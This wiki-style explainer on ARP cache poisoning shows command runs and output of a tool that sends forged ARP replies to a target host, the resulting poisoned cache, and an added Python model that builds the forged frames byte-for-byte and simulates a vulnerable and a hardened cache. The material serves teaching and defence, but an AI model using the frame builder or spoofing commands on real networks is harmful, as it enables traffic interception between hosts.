ARP poisoning

From Hackepedia
Revision as of 13:03, 7 August 2013 by Pbug (talk | contribs) (arp poison)

ARP poisoning is manipulating a computer's ARP cache (its IP-to-MAC mapping table) in such a way that traffic from that host, destined for some IP address, is delivered to a different host, usually one the attacker controls. Because ARP replies are neither authenticated nor, on most systems, checked against an outstanding request, anyone on the same broadcast domain can inject them.

A normal exchange goes like this:

computer1 broadcasts: "who has 1.2.3.4? tell <computer1's MAC address>"
computer2, which owns 1.2.3.4, replies unicast to computer1's MAC address:
"1.2.3.4 is-at <computer2's MAC address>"

If a malicious computer3 now also answers that ARP request (or simply sends an unsolicited reply), computer1 may notice the conflicting answers and report an IP conflict, but it does not have to; most stacks just take whichever reply arrived last.

Here is a run of a program that sends forged ARP replies to a host. It is invoked twice, each time claiming a different MAC address for the same IP address (192.168.34.99), and directs both replies at 192.168.34.1:

#  ./cb -a is-at -s00:11:22:33:44:55,192.168.34.99   -d192.168.34.1  -v -l re0 
--> interface_gateway: looking up gateway mac for  192.168.34.1
--> interface_gateway: resolved to mac address 0.90.b.19.56.6
--> arp reply to 00:90:0b:19:56:06 (192.168.34.1)  "192.168.34.99 is-at 00:11:22:33:44:55"
1 packet written at 60 bytes totalling 60 bytes
#  ./cb -a is-at -s00:11:22:33:44:56,192.168.34.99   -d192.168.34.1  -v -l re0 
--> interface_gateway: looking up gateway mac for 192.168.34.1
--> interface_gateway: resolved to mac address 0.90.b.19.56.6
--> arp reply to 00:90:0b:19:56:06 (192.168.34.1) "192.168.34.99 is-at 00:11:22:33:44:56"
1 packet written at 60 bytes totalling 60 bytes

Notice that the MAC address claimed for 192.168.34.99 changes from 00:11:22:33:44:55 in the first reply to 00:11:22:33:44:56 in the second.

On the target computer (IP 192.168.34.1) we can inspect the ARP cache after each reply with the arp -na command:

first arp reply:
? (192.168.34.99) at 00:11:22:33:44:55 on em2
second arp reply:
? (192.168.34.99) at 00:11:22:33:44:56 on em2

The cache entry for 192.168.34.99 on 192.168.34.1 is now said to be ARP poisoned: all traffic that host sends to 192.168.34.99 goes to the MAC address 00:11:22:33:44:56 instead of 00:11:22:33:44:55, without 192.168.34.99 itself having been involved at all. Some operating systems log the overwrite, as here on OpenBSD:

arp info overwritten for 192.168.34.99 by 00:11:22:33:44:56 on em2
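The two replies above, and what they do to the victim's cache, as an added example that is not part of the original page and has nothing to do with the cb program: a Python model (standard library only, no packets are sent) that builds the same two Ethernet/ARP "is-at" frames, parses them the way a receiving stack would, and applies them to a simulated ARP cache that logs the OpenBSD-style "arp info overwritten" message. The interface name em2, the gateway MAC 00:90:0b:19:56:06 and the addresses are taken from the page's output; the accept_unsolicited switch is an assumption added to show the hardened behaviour (ignore replies nobody asked for), not something the page describes.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2
MIN_FRAME = 60  # minimum Ethernet frame without FCS; matches "60 bytes" in the page's cb output


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply: '<sender_ip> is-at <sender_mac>'.
    The Ethernet destination and the ARP target are both the victim (cb's -d);
    sender_mac/sender_ip are whatever the attacker claims (cb's -s)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, op=2 (reply)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return (eth + arp).ljust(MIN_FRAME, b"\x00")  # pad to the 60-byte minimum


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame (IPv4 over Ethernet only)."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


class ArpCache:
    """Toy model of a host's ARP cache. With accept_unsolicited=True (the common
    default) any reply updates the table; otherwise only replies to an IP we
    actually asked about (via request()) are honoured. Overwrites are logged
    in the format OpenBSD uses."""

    def __init__(self, ifname: str, accept_unsolicited: bool = True):
        self.ifname = ifname
        self.accept_unsolicited = accept_unsolicited
        self.pending = set()   # IPs with an outstanding request
        self.table = {}        # ip -> mac
        self.log = []

    def request(self, ip: str) -> None:
        self.pending.add(ip)

    def process(self, frame: bytes):
        arp = parse_arp(frame)
        if arp["op"] != ARP_REPLY:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if not self.accept_unsolicited and ip not in self.pending:
            return None  # hardened: ignore a reply nobody asked for
        self.pending.discard(ip)
        old = self.table.get(ip)
        self.table[ip] = mac
        if old is not None and old != mac:
            msg = f"arp info overwritten for {ip} by {mac} on {self.ifname}"
            self.log.append(msg)
            return msg
        return None

    def dump(self) -> list:
        """Entries in the style of 'arp -na' on BSD."""
        return [f"? ({ip}) at {mac} on {self.ifname}" for ip, mac in self.table.items()]


def demo(accept_unsolicited: bool = True):
    """Replay the page's two forged replies against a cache on 192.168.34.1 (if em2)."""
    victim = ArpCache("em2", accept_unsolicited)
    gw_mac = "00:90:0b:19:56:06"
    first = build_arp_reply("00:11:22:33:44:55", "192.168.34.99", gw_mac, "192.168.34.1")
    second = build_arp_reply("00:11:22:33:44:56", "192.168.34.99", gw_mac, "192.168.34.1")
    return victim, victim.process(first), victim.process(second)


if __name__ == "__main__":
    victim, w1, w2 = demo()
    print(victim.dump())
    print(w1, "|", w2)
```

The hardened cache only narrows the window: an attacker who watches the wire can answer a genuine request faster than the real owner, so it is a mitigation, not a fix. The frame layout (14-byte Ethernet header, 28-byte ARP body, zero padding to 60 bytes) is exactly what a raw-socket sender would put on the wire.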

I hope that helps understanding this. (BTW the cb program is not publicly available and only a select number of people have it.)